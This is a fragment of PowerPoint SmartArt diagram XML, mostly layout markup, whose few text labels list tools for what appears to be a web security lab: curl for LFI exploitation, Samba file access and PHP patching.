    <dgm:pt modelId="{06DCB4A7-42B9-4833-A392-B244729FE18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>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Curl for HTTP requests and LFI exploitation.</a:t>
          </a:r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754AECA-3101-4815-AD4B-3ED80AB12600}" type="parTrans" cxnId="{361B8B28-1030-4902-8EB0-ABDC31EB98C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88DEF585-8F47-42CE-91FE-9DCE64A83726}" type="sibTrans" cxnId="{361B8B28-1030-4902-8EB0-ABDC31EB98C9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3B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>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Samba (SMB) for accessing and modifying the web server files via CIFS mount.</a:t>
          </a:r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7A1B831-353E-48A0-A06A-811841DACDDD}" type="parTrans" cxnId="{C7473186-27D1-4C04-A3DD-218855263D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6526098E-3714-488C-A3F4-9E708BCAA29F}" type="sibTrans" cxnId="{C7473186-27D1-4C04-A3DD-218855263D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87539FAD-D430-4746-9EBF-FAB9E195161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>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>PHP patching for secure coding validation.</a:t>
          </a:r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871738-6BF0-40E8-8C02-AA71E317E018}" type="parTrans" cxnId="{EB614E42-FF1E-4596-BEDE-B57162F89EE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B3F3D06-3430-42B2-8EF5-2307835EF8E3}" type="sibTrans" cxnId="{EB614E42-FF1E-4596-BEDE-B57162F89EE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" type="pres">
      <dgm:prSet presAssocID="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0A5E8F2-711E-4ED7-8C57-6F34564B9F50}" type="pres">
      <dgm:prSet presAssocID="{3E2DF8CF-B68D-4925-B3EE-8FAF10C8025E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5E175C99-3EF5-4DD2-987E-6F30E423A44B}" type="pres">
      <dgm:prSet presAssocID="{3E2DF8CF-B68D-4925-B3EE-8FAF10C8025E}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AFF6D79F-42B0-4829-B00D-B024C26EA83C}" type="pres">
      <dgm:prSet presAssocID="{3E2DF8CF-B68D-4925-B3EE-8FAF10C8025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 Diagram"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{8B0E915D-C504-4F0A-AF8C-2BF5391280D0}" type="pres">
      <dgm:prSet presAssocID="{3E2DF8CF-B68D-4925-B3EE-8FAF10C8025E}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{194B6A80-5140-40DE-A61A-2F8C784EC16A}" type="pres">
      <dgm:prSet presAssocID="{3E2DF8CF-B68D-4925-B3EE-8FAF10C8025E}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C985B520-A0BC-4F7D-B7DA-0119FDBCCE2D}" type="pres">
      <dgm:prSet presAssocID="{F7454E2F-3F7F-4121-B92B-E6D06D589CF7}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93385A17-7B0F-41C9-9D12-7FC81EA3F74A}" type="pres">
      <dgm:prSet presAssocID="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD82}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E4F14064-33B9-4A7B-B413-6C9B1C484B13}" type="pres">
      <dgm:prSet presAssocID="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD82}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6448A3C-C484-40A4-8E4D-88180BCDAE90}" type="pres">
      <dgm:prSet presAssocID="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD82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ting"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{6211782D-0789-4F18-8370-B57A3AB73ACF}" type="pres">
      <dgm:prSet presAssocID="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD82}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64541CA6-FF50-40D5-AEED-480A5EBF4F58}" type="pres">
      <dgm:prSet presAssocID="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD82}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7215E79B-8ECC-43BA-8B97-56E46DB57303}" type="pres">
      <dgm:prSet presAssocID="{2DFBD1DA-1BA6-49FA-8363-69DD9B163BBA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{983A251E-7139-4493-851F-EC937CE75D15}" type="pres">
      <dgm:prSet presAssocID="{923AEA18-2F54-4902-80FE-19FD64E8CC9B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4FCC8041-9B80-4132-B472-491F76938797}" type="pres">
      <dgm:prSet presAssocID="{923AEA18-2F54-4902-80FE-19FD64E8CC9B}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2A410F4-7C34-43E6-B567-B5F93B0AA8E5}" type="pres">
      <dgm:prSet presAssocID="{923AEA18-2F54-4902-80FE-19FD64E8CC9B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181823F6-A485-4C44-AB66-38056ED004BC}" type="pres">
      <dgm:prSet presAssocID="{923AEA18-2F54-4902-80FE-19FD64E8CC9B}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B17B3A4F-8694-4B2D-8C88-F1128EE40F5A}" type="pres">
      <dgm:prSet presAssocID="{923AEA18-2F54-4902-80FE-19FD64E8CC9B}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00A2B553-B483-4970-8352-F4C6AA4A01FB}" type="pres">
      <dgm:prSet presAssocID="{43CA5CFD-33E2-4D1C-AFEB-9B7B8D380D50}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A462E7B-EC4A-4D42-B1BF-1150FD00EB41}" type="pres">
      <dgm:prSet presAssocID="{06DCB4A7-42B9-4833-A392-B244729FE180}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55A781B3-0397-48C4-B76C-EEFEEBDBB5EA}" type="pres">
      <dgm:prSet presAssocID="{06DCB4A7-42B9-4833-A392-B244729FE180}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2635FC07-3D36-490E-BD95-5A6749D7F565}" type="pres">
      <dgm:prSet presAssocID="{06DCB4A7-42B9-4833-A392-B244729FE180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shes"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{7B3F9673-7221-4B86-91DB-B35E6ED3FE56}" type="pres">
      <dgm:prSet presAssocID="{06DCB4A7-42B9-4833-A392-B244729FE180}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D113540-EBAB-4445-9A1D-4C4BCA56D261}" type="pres">
      <dgm:prSet presAssocID="{06DCB4A7-42B9-4833-A392-B244729FE180}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF2F9D53-E889-4220-9E2A-CF3C2FA67F7D}" type="pres">
      <dgm:prSet presAssocID="{88DEF585-8F47-42CE-91FE-9DCE64A83726}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F5EAEB7E-C343-4B65-B52E-FAAFC7D353F2}" type="pres">
      <dgm:prSet presAssocID="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3BA}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{28CC85DF-37D5-4037-87F4-83A746D2BA1C}" type="pres">
      <dgm:prSet presAssocID="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3BA}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B881BA35-47A5-4B1E-B621-939AD26E8F8F}" type="pres">
      <dgm:prSet presAssocID="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3BA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um"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{BB64A748-4E07-42E0-AAB3-C12026F797B7}" type="pres">
      <dgm:prSet presAssocID="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3BA}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{45E1E5AA-74BA-45CB-88CB-63A70B5F7D19}" type="pres">
      <dgm:prSet presAssocID="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3BA}" presName="textRect" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B68A34FE-BAEE-440A-AA19-CBB29952C7DC}" type="pres">
      <dgm:prSet presAssocID="{6526098E-3714-488C-A3F4-9E708BCAA29F}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{801D8475-52F3-44A8-B4D3-246C149E3A34}" type="pres">
      <dgm:prSet presAssocID="{87539FAD-D430-4746-9EBF-FAB9E1951615}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E053482C-DCD7-4BBE-A13C-BDFC013892FF}" type="pres">
      <dgm:prSet presAssocID="{87539FAD-D430-4746-9EBF-FAB9E1951615}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{31F0C0EE-BA56-4323-9CF8-26EA11EA1BD7}" type="pres">
      <dgm:prSet presAssocID="{87539FAD-D430-4746-9EBF-FAB9E195161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3ACD7D3-24F8-4DDE-B3D5-083FBCA997E0}" type="pres">
      <dgm:prSet presAssocID="{87539FAD-D430-4746-9EBF-FAB9E1951615}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1D8A8D9-6F8B-40D5-A0DA-75DE358048C7}" type="pres">
      <dgm:prSet presAssocID="{87539FAD-D430-4746-9EBF-FAB9E1951615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361B8B28-1030-4902-8EB0-ABDC31EB98C9}" srcId="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" destId="{06DCB4A7-42B9-4833-A392-B244729FE180}" srcOrd="3" destOrd="0" parTransId="{6754AECA-3101-4815-AD4B-3ED80AB12600}" sibTransId="{88DEF585-8F47-42CE-91FE-9DCE64A83726}"/>
    <dgm:cxn modelId="{6BC7815E-C9BA-4217-8EE5-7428BAC5F216}" type="presOf" srcId="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD82}" destId="{64541CA6-FF50-40D5-AEED-480A5EBF4F58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{EB614E42-FF1E-4596-BEDE-B57162F89EE0}" srcId="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" destId="{87539FAD-D430-4746-9EBF-FAB9E1951615}" srcOrd="5" destOrd="0" parTransId="{A0871738-6BF0-40E8-8C02-AA71E317E018}" sibTransId="{8B3F3D06-3430-42B2-8EF5-2307835EF8E3}"/>
    <dgm:cxn modelId="{BDEDB84D-74E4-4C59-B110-BDC48E8E7C34}" type="presOf" srcId="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3BA}" destId="{45E1E5AA-74BA-45CB-88CB-63A70B5F7D19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6DB27D56-1335-4FE9-9F07-716331A5A5AA}" type="presOf" srcId="{923AEA18-2F54-4902-80FE-19FD64E8CC9B}" destId="{B17B3A4F-8694-4B2D-8C88-F1128EE40F5A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C7473186-27D1-4C04-A3DD-218855263D8A}" srcId="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" destId="{0A16F90E-5C8E-4AD2-AD6C-3C561392E3BA}" srcOrd="4" destOrd="0" parTransId="{57A1B831-353E-48A0-A06A-811841DACDDD}" sibTransId="{6526098E-3714-488C-A3F4-9E708BCAA29F}"/>
    <dgm:cxn modelId="{A52FAA95-6459-40A4-908D-E6EF1E2A18C9}" type="presOf" srcId="{87539FAD-D430-4746-9EBF-FAB9E1951615}" destId="{E1D8A8D9-6F8B-40D5-A0DA-75DE358048C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{08605EA3-AED2-4694-AFFF-16D08B767771}" type="presOf" srcId="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" destId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{456ACAAD-093A-4181-AC59-3AA10A0E99EB}" type="presOf" srcId="{06DCB4A7-42B9-4833-A392-B244729FE180}" destId="{9D113540-EBAB-4445-9A1D-4C4BCA56D261}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{4AB78ABC-0366-4630-AD06-4CC7F986AC88}" srcId="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" destId="{3E2DF8CF-B68D-4925-B3EE-8FAF10C8025E}" srcOrd="0" destOrd="0" parTransId="{2E844FC4-2FDA-4302-B936-4915DC6C122E}" sibTransId="{F7454E2F-3F7F-4121-B92B-E6D06D589CF7}"/>
    <dgm:cxn modelId="{5F97B8CD-E3EE-422D-844E-C3C43F27B7B4}" srcId="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" destId="{923AEA18-2F54-4902-80FE-19FD64E8CC9B}" srcOrd="2" destOrd="0" parTransId="{081A15CB-892A-41D0-9418-9F73B8826FD0}" sibTransId="{43CA5CFD-33E2-4D1C-AFEB-9B7B8D380D50}"/>
    <dgm:cxn modelId="{8A29EADB-85A5-49AC-863D-DC785F2E5F85}" type="presOf" srcId="{3E2DF8CF-B68D-4925-B3EE-8FAF10C8025E}" destId="{194B6A80-5140-40DE-A61A-2F8C784EC16A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{94C078FC-8319-434C-B4E4-FFCE9133B71A}" srcId="{DB042CCD-BB3D-4DDE-BD62-5095C324BAD7}" destId="{7B8FCDF4-B11A-4905-9A1A-D6899A9EDD82}" srcOrd="1" destOrd="0" parTransId="{7C89A9DD-139A-4C0F-8B9F-1DD5AE3BE975}" sibTransId="{2DFBD1DA-1BA6-49FA-8363-69DD9B163BBA}"/>
    <dgm:cxn modelId="{159D2826-376D-46DE-BC85-E7E2D3CE7956}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{F0A5E8F2-711E-4ED7-8C57-6F34564B9F50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6D22D4FE-38AB-41D2-AD20-0943147E60DF}" type="presParOf" srcId="{F0A5E8F2-711E-4ED7-8C57-6F34564B9F50}" destId="{5E175C99-3EF5-4DD2-987E-6F30E423A44B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{8D5312A2-DEA4-403A-A7FA-DF185C9DC3CC}" type="presParOf" srcId="{F0A5E8F2-711E-4ED7-8C57-6F34564B9F50}" destId="{AFF6D79F-42B0-4829-B00D-B024C26EA83C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{83B2B9A6-46BC-4C60-9E60-FF7032ED9008}" type="presParOf" srcId="{F0A5E8F2-711E-4ED7-8C57-6F34564B9F50}" destId="{8B0E915D-C504-4F0A-AF8C-2BF5391280D0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{45F7430E-7E9C-43FB-9CD0-7012C993E2FE}" type="presParOf" srcId="{F0A5E8F2-711E-4ED7-8C57-6F34564B9F50}" destId="{194B6A80-5140-40DE-A61A-2F8C784EC16A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{87BBB2A9-F0FE-40E0-B4A1-4050477D7705}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{C985B520-A0BC-4F7D-B7DA-0119FDBCCE2D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{054FDDFB-0763-419B-B9C0-6E24F4B66B19}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{93385A17-7B0F-41C9-9D12-7FC81EA3F74A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{D18CACB6-1CE3-4BAC-A8A3-51C4FE784260}" type="presParOf" srcId="{93385A17-7B0F-41C9-9D12-7FC81EA3F74A}" destId="{E4F14064-33B9-4A7B-B413-6C9B1C484B13}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{3DF8A3D1-D23C-44DC-9FA2-3B70C92BF1EC}" type="presParOf" srcId="{93385A17-7B0F-41C9-9D12-7FC81EA3F74A}" destId="{A6448A3C-C484-40A4-8E4D-88180BCDAE90}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9CF85C4C-49D0-482A-9E01-D7D45E5FC793}" type="presParOf" srcId="{93385A17-7B0F-41C9-9D12-7FC81EA3F74A}" destId="{6211782D-0789-4F18-8370-B57A3AB73ACF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{21C0070C-850B-4171-B7D0-19F2B47A0BF3}" type="presParOf" srcId="{93385A17-7B0F-41C9-9D12-7FC81EA3F74A}" destId="{64541CA6-FF50-40D5-AEED-480A5EBF4F58}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{D0F7C97E-CE39-4908-B288-7B1807AD430C}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{7215E79B-8ECC-43BA-8B97-56E46DB57303}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{4342F8DB-1F13-4430-9B27-0F8588178962}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{983A251E-7139-4493-851F-EC937CE75D15}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5121C971-AF72-4541-8B74-608A393D29D4}" type="presParOf" srcId="{983A251E-7139-4493-851F-EC937CE75D15}" destId="{4FCC8041-9B80-4132-B472-491F76938797}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{94B67319-02B7-4E66-BF15-509AA0AF0AE0}" type="presParOf" srcId="{983A251E-7139-4493-851F-EC937CE75D15}" destId="{D2A410F4-7C34-43E6-B567-B5F93B0AA8E5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{62A099D2-3ECB-4C86-AB93-1FCB341D4571}" type="presParOf" srcId="{983A251E-7139-4493-851F-EC937CE75D15}" destId="{181823F6-A485-4C44-AB66-38056ED004BC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{91212618-5F72-4589-BE7E-2779BDFDDA02}" type="presParOf" srcId="{983A251E-7139-4493-851F-EC937CE75D15}" destId="{B17B3A4F-8694-4B2D-8C88-F1128EE40F5A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{E04C5A99-D7C5-452D-B8BE-AC70F542E731}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{00A2B553-B483-4970-8352-F4C6AA4A01FB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{BE0E11E4-BBCB-4662-BDC0-B7759DB5F750}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{5A462E7B-EC4A-4D42-B1BF-1150FD00EB41}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{20E1152F-38F0-41F5-AB17-A7E6BED068F4}" type="presParOf" srcId="{5A462E7B-EC4A-4D42-B1BF-1150FD00EB41}" destId="{55A781B3-0397-48C4-B76C-EEFEEBDBB5EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C89FACCF-B5BC-498F-94B8-6B12327938CD}" type="presParOf" srcId="{5A462E7B-EC4A-4D42-B1BF-1150FD00EB41}" destId="{2635FC07-3D36-490E-BD95-5A6749D7F565}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5A7C3E5A-8E84-43B8-8347-377C2BC25133}" type="presParOf" srcId="{5A462E7B-EC4A-4D42-B1BF-1150FD00EB41}" destId="{7B3F9673-7221-4B86-91DB-B35E6ED3FE56}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{7560CAE3-D3E9-48A3-9ED9-B3BFC8D5B970}" type="presParOf" srcId="{5A462E7B-EC4A-4D42-B1BF-1150FD00EB41}" destId="{9D113540-EBAB-4445-9A1D-4C4BCA56D261}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{089C62E6-686F-4671-B97B-74BD976A08C0}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{EF2F9D53-E889-4220-9E2A-CF3C2FA67F7D}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{BE91C708-3DC1-4450-A378-E42688C4EFEB}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{F5EAEB7E-C343-4B65-B52E-FAAFC7D353F2}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{EAC6827C-B074-49DB-8253-4DC59A279963}" type="presParOf" srcId="{F5EAEB7E-C343-4B65-B52E-FAAFC7D353F2}" destId="{28CC85DF-37D5-4037-87F4-83A746D2BA1C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{CA8C96B4-89A4-44C1-8376-AEFDA86CAECD}" type="presParOf" srcId="{F5EAEB7E-C343-4B65-B52E-FAAFC7D353F2}" destId="{B881BA35-47A5-4B1E-B621-939AD26E8F8F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{60A68D73-70C4-470C-BB1C-16FC91961AFD}" type="presParOf" srcId="{F5EAEB7E-C343-4B65-B52E-FAAFC7D353F2}" destId="{BB64A748-4E07-42E0-AAB3-C12026F797B7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5DF60ED7-0441-4C73-8B91-B4DC3F91BF08}" type="presParOf" srcId="{F5EAEB7E-C343-4B65-B52E-FAAFC7D353F2}" destId="{45E1E5AA-74BA-45CB-88CB-63A70B5F7D19}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{56E65F5C-9C1A-42E9-803F-AB1F176A0E35}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{B68A34FE-BAEE-440A-AA19-CBB29952C7DC}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{0ABC1ED2-0063-4034-9F02-1C4F48590A73}" type="presParOf" srcId="{8458C022-C7C6-44EB-85DB-FBC79DF6348D}" destId="{801D8475-52F3-44A8-B4D3-246C149E3A34}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{DEF3B883-7F70-4140-8D93-88B82E80DF2E}" type="presParOf" srcId="{801D8475-52F3-44A8-B4D3-246C149E3A34}" destId="{E053482C-DCD7-4BBE-A13C-BDFC013892FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
